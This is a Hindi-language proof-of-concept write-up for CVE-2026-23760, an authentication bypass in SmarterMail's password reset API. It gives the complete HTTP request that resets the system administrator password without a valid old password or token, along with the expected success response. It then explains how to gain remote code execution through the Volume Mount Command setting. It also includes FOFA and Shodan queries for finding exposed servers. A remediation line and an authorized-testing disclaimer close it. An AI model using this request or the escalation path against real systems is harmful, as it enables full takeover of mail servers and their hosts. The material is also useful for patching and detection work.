
CVE-2026-23760 - SmarterMail में पासवर्ड रीसेट API के माध्यम से एक प्रमाणीकरण बायपास।
SmarterMail सिस्टम व्यवस्थापक खाते के लिए पासवर्ड रीसेट API के माध्यम से प्रमाणीकरण बाईपास का शोषण करने वाला एक proof-of-concept।
यह भेद्यता पासवर्ड रीसेट API में प्रमाणीकरण बाईपास के कारण मौजूद है। force-reset-password एंडपॉइंट अनाम अनुरोधों की अनुमति देता है और सिस्टम व्यवस्थापक खातों को रीसेट करते समय मौजूदा पासवर्ड या रीसेट टोकन को सत्यापित करने में विफल रहता है।
PoC इतना सरल है:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
आपको निम्नलिखित प्रतिक्रिया प्राप्त होनी चाहिए, जो पुष्टि करती है कि पासवर्ड सफलतापूर्वक संशोधित किया गया था:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
एकमात्र शेष आवश्यकता व्यवस्थापक खाते का उपयोगकर्ता नाम जानना है।
एक बार सिस्टम व्यवस्थापक के रूप में प्रमाणित होने के बाद, एक हमलावर यह कर सकता है:
Settings -> Volume Mounts पर नेविगेट करें।Volume Mount Command फ़ील्ड में एक मनमाना कमांड प्रदान करें।वह कमांड अंतर्निहित ऑपरेटिंग सिस्टम द्वारा निष्पादित किया जाता है। उस बिंदु पर, हमलावर ने होस्ट पर पूर्ण रिमोट कोड निष्पादन प्राप्त कर लिया है।
जब कॉन्फ़िगरेशन सहेजा जाता है, तो आपूर्ति किया गया कमांड तुरंत निष्पादित किया जाता है।
Nuclei-Template:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
FOFA:
title='SmarterMail'
SHODAN:
html:'SmarterMail'
एक अनाम रिमोट हमलावर सिस्टम व्यवस्थापक खाते के लिए प्रमाणीकरण को बाईपास कर सकता है और पहुंच प्राप्त कर सकता है। एक बार प्रमाणित होने के बाद, वे होस्ट पर पूर्ण रिमोट कोड निष्पादन पूरा कर सकते हैं।
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:गंभीर
नवीनतम संस्करण में अपडेट करें: https://www.smartertools.com/smartermail/downloads
यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।